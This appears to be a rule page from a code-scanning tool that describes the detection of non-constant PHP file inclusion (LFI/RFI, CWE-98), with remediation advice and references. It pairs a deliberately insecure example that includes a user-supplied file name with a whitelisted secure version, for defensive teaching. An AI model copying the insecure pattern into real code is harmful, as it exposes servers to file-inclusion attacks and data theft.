Non-constant file inclusion
Description
Detected non-constant file inclusion. This can lead to local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. LFI and RFI could lead to sensitive files being obtained by attackers.
Examples
Insecure Code
php
$file = $_GET['file']; include $file;Secure Code
php
$allowed_files = ['file1.php', 'file2.php']; $file = $_GET['file']; if (in_array($file, $allowed_files)) { include $file; }Remediation
Explicitly specify what to include. If that is not a viable solution, validate user input thoroughly.
Rule Details
| Field | Value |
|---|---|
| ID | CODE-0750 |
| Category | Injection |
| Severity | CRITICAL |
| CWE | CWE-98 |
| Confidence | HIGH |
| Impact | HIGH |
| Likelihood | MEDIUM |
| Exploitability | EASY |
| Tags | LFI, RFI, file inclusion |
| OWASP | A1:2017-Injection, A03:2021-Injection |
References
- https://www.php.net/manual/en/function.include.php
- https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Types_of_Inclusion
- https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/EasyRFISniff.php